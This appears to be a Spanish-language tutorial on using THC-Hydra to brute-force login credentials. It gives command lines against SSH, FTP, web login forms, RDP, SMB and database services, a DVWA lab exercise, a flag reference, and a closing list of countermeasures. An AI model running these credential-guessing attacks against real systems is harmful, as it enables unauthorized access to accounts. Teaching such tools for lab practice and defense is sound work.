Hydra: Ataques de Fuerza Bruta

THC-Hydra es la herramienta de fuerza bruta online más rápida y versátil, compatible con más de 50 protocolos: SSH, FTP, HTTP, SMB, RDP, MySQL, etc.

Sintaxis general

hydra [opciones] -l usuario -P diccionario.txt [IP] [protocolo]

1. Fuerza bruta SSH

# Usuario conocido, diccionario de contraseñas:
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10

# Lista de usuarios + diccionario:
hydra -L usuarios.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10

# Con puerto no estándar:
hydra -l admin -P pass.txt -s 2222 ssh://192.168.1.10

# Aumentar threads (más rápido):
hydra -l root -P pass.txt -t 16 ssh://192.168.1.10

2. Fuerza bruta FTP

hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.10
hydra -L users.txt -P pass.txt ftp://192.168.1.10 -V

3. Fuerza bruta HTTP (formulario web)

# HTTP POST (login form):
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  192.168.1.10 http-post-form \
  "/login:username=^USER^&password=^PASS^:Invalid credentials"

# HTTP GET:
hydra -l admin -P pass.txt \
  192.168.1.10 http-get-form \
  "/login:user=^USER^&pass=^PASS^:Login failed"

# Con cookie de sesión:
hydra -l admin -P pass.txt \
  192.168.1.10 http-post-form \
  "/login:user=^USER^&pass=^PASS^:error:H=Cookie: PHPSESSID=abc123"

4. Fuerza bruta RDP, SMB, MySQL

# RDP (Windows Remote Desktop):
hydra -l Administrator -P pass.txt rdp://192.168.1.10

# SMB (Windows file sharing):
hydra -l Administrator -P pass.txt smb://192.168.1.10

# MySQL:
hydra -l root -P pass.txt mysql://192.168.1.10

# PostgreSQL:
hydra -l postgres -P pass.txt postgres://192.168.1.10

5. DVWA — Práctica de fuerza bruta HTTP

# DVWA nivel low — fuerza bruta al login:
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  10.0.2.4 http-get-form \
  "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: PHPSESSID=tu_session_id; security=low"

6. Opciones importantes

Flag	Descripción
`-l`	Usuario único
`-L`	Archivo con lista de usuarios
`-p`	Contraseña única
`-P`	Archivo diccionario de contraseñas
`-t`	Número de threads paralelos (default: 16)
`-s`	Puerto alternativo
`-V`	Verbose: mostrar cada intento
`-o`	Guardar resultados en archivo
`-f`	Parar al encontrar la primera credencial válida
`-x`	Generación dinámica de contraseñas

Contramedidas

Fail2Ban: bloquea IPs tras N intentos fallidos.
Límite de intentos: máximo 3-5 intentos antes de bloqueo temporal.
CAPTCHA: en formularios de login.
2FA/MFA: autenticación multifactor.
Contraseñas seguras: mínimo 12 caracteres, letras, números y símbolos.